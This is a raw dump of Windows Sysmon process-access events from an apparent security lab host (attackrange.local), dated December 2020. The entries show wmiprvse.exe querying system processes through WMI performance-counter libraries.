13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004905Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004904Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004903Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004902Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004901Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004900Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004899Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004898Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004897Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004896Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004895Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004894Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004893Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004892Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004891Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004890Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 